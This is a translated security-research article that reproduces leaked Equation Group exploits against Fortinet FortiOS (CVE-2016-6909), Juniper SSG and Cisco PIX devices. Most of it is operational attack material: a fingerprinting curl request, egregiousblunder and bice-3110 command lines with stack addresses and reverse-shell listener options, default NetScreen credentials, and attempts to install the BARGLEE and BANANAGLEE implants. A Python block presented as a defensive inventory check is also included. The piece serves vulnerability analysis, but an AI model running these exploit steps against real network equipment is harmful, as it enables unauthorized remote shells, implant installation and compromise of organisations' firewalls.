*The original author of this article: tigerlab. This article belongs to the FreeBuf original reward program and may not be reproduced without permission.
On August 16, 2016, the hacker group "The Shadow Brokers" claimed to have breached the "Equation Group" and leaked to the Internet part of the hacking tools it had obtained from that group's computer systems.
tigerlab analyzed the leaked files in depth as soon as they appeared. Verification and analysis of most of the vulnerabilities has already been shared by peers; here we share the verification and analysis of three vulnerabilities that have not yet been analyzed, covering Fortinet, Juniper and Cisco.
1. Fortinet vulnerability verification
This vulnerability is a buffer overflow in the cookie parser that allows a remote attacker to execute arbitrary code by sending a crafted HTTP request.
CVE No.: CVE-2016-6909
The following versions are affected:
Fortinet FortiOS 4.1.x before 4.1.11,
4.2.x before 4.2.13,
4.3.x before 4.3.9,
FortiSwitch before 3.4.3.
The vulnerability verification process is as follows:
Get the target's ETag and determine the version type:
curl -X HEAD -v http://xxx.xxx.xxx.xxx/
Etag:480d772a
If the ETag is less than 4dxxxxxx, the version-3 path applies;
if the ETag is greater than 4dxxxxxx, determine whether cookienum is required:
curl -X HEAD -v http://xxx.xxx.xxx.xxx/login
APSCOOKIE=0&0: cookienum does not need to be set when executing the command.
APSCOOKIE_=0&0: cookienum must be set when executing the command, and the version is 4Nc.
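The affected-version list and the ETag/APSCOOKIE decision rule above are encoded below as an inventory check for devices you administer. This is an added example, not code from the original article or from the leaked tools; the numeric threshold 0x4d000000 is my reading of the article's "4dxxxxxx" wording and the sample responses are constructed.

```python
import re

# Affected ranges as the article lists them: (product, branch prefix, first fixed release).
# A None branch means "every release before the fixed one" (the FortiSwitch entry).
AFFECTED = [
    ("FortiOS", (4, 1), (4, 1, 11)),
    ("FortiOS", (4, 2), (4, 2, 13)),
    ("FortiOS", (4, 3), (4, 3, 9)),
    ("FortiSwitch", None, (3, 4, 3)),
]

# Threshold assumed from the article's "4dxxxxxx" rule (an assumption, not a vendor value).
ETAG_THRESHOLD = 0x4D000000


def parse_version(version):
    """'4.3.8' -> (4, 3, 8); any build suffix after the digits is ignored."""
    return tuple(int(x) for x in re.findall(r"\d+", version))


def is_affected(product, version):
    """True if the product/version pair falls inside one of the listed ranges."""
    v = parse_version(version)
    for prod, branch, fixed in AFFECTED:
        if prod != product or (branch is not None and v[:2] != branch):
            continue
        return v < fixed
    return False  # not a listed branch, so outside the scope of this advisory


def classify_headers(raw_headers):
    """Apply the article's ETag / APSCOOKIE decision rule to a captured
    response (HTTP headers as text) and name the branch the device is in."""
    m = re.search(r"^ETag:\s*\"?([0-9a-fA-F]{8})", raw_headers, re.M | re.I)
    if not m:
        return "unknown: no ETag header"
    if int(m.group(1), 16) < ETAG_THRESHOLD:
        return "etag below 4dxxxxxx: version-3 path, no cookienum"
    if re.search(r"\bAPSCOOKIE_=", raw_headers):
        return "etag above 4dxxxxxx: APSCOOKIE_ form, cookienum required (4Nc)"
    if re.search(r"\bAPSCOOKIE=", raw_headers):
        return "etag above 4dxxxxxx: APSCOOKIE form, no cookienum"
    return "etag above 4dxxxxxx: cookie form not visible in headers"


# Constructed sample responses (not captures from real devices).
SAMPLE_V3 = "HTTP/1.1 200 OK\r\nETag: 480d772a\r\nSet-Cookie: APSCOOKIE=0&0\r\n"
SAMPLE_4NC = "HTTP/1.1 200 OK\r\nETag: 4f1a2b3c\r\nSet-Cookie: APSCOOKIE_=0&0\r\n"
```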
Test case: the ETag is less than 4dxxxxxx and cookienum is not present.
1) Get the overflow address
Check whether the ETag already exists in the configuration file EGBL.config.
If it does not, the stack address can be obtained with the following command:
./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v --config ./EGBL.config --wam 10
This command only applies when the ETag is less than 4dxxxxxx and cookienum is absent; on other versions it is invalid and cannot obtain the stack address.
The command runs as follows:
Stack address 0xbffff274 obtained successfully.
2) Execute the shellcode and return a shell
The shell can be bounced back by passing the stack address directly:
./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v --stack 0xbffff274 --nopen --gen 3
Alternatively, the ETag can be written to the configuration file:
ETAG = 480d772a : 0xbffff274
./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v --etag 480d772a --nopen --gen 3 --config ./EGBL.config
The shell is returned successfully; executing the ls command lists the directory contents.
In this test the device was mainly a low-version Fortinet unit whose ETag is less than 4dxxxxxx. Because the exploit's overflow process was not analyzed in depth, on other versions, where the stack address cannot be obtained by the command, we tested by traversing memory addresses in the configuration file, and the shell could still be bounced back successfully.
2. Juniper vulnerability verification
To use this vulnerability, the Juniper device password must first be obtained; the attack is then carried out according to the device version and model to gain system privileges.
Log in via Telnet to obtain the device version information.
The device version is ssg5ssg20.6.1.0r2.0. Check whether the corresponding device file exists in the dats folder.
Vulnerability reproduction
bice-3110 in the BARGLEE folder is the Juniper exploit tool:
./bice-3110 -R *.*.*.*                          // target IP
-D 127.0.0.1                                    // IP of the host receiving the reverse shell
-D 5555                                         // port of the host receiving the reverse shell
-M telnet                                       // login mode: SSH / telnet
-T ../../dats/ssg5ssg20.6.1.0r2.0.xml           // attack code configuration
-U NetScreen                                    // device account
-P NetScreen                                    // device password
On success, the basic information of the device is returned. Two kinds of shell access can be chosen: the Juniper interactive shell and the BI shell.
The interactive console is in fact the same command operation as after logging in to the Juniper device via telnet.
BI shell
Six options can be executed:
Return the target status
Uninstall BARGLEE
Install BARGLEE
Read memory
Write memory
Command execution
Following the installation instructions in barrice.txt in the script folder, we tried to implant BARGLEE.
The bin file type was tried many times, but the implant could not be installed successfully, so deeper analysis was not possible.
3. Cisco EPBA vulnerability verification
As with Juniper, this vulnerability requires the device password first; system privileges are then obtained through an overflow attack.
Vulnerability reproduction
The result received is "MTU – EPBA: OK, payload: OK", indicating that the overflow succeeded.
At the same time, the console of the PIX firewall (pix722) shows a buffer overflow message.
Next we run the script "bridge-1120" following the on-screen prompts. Executing option "1" checks whether the connection is normal; if the connection succeeds, the session D-H key is returned.
After executing option "8", the shell functions of Brice can be viewed.
Multiple attempts to write BANANAGLEE indicate that the version does not match and it cannot be written.
We found that the version number is obtained by reading the first four bytes of the target file, and every file in the folder was tried,
but the search did not find a suitable implant.
Summary
This article mainly shares the verification approach and process for three exploit files: Fortinet, Juniper and Cisco.
During the analysis we carried out many test experiments to restore the whole attack process as completely as possible, but because some key files are missing we could not carry the analysis through to completion. Anyone with better analytical ideas is welcome to get in touch and exchange views.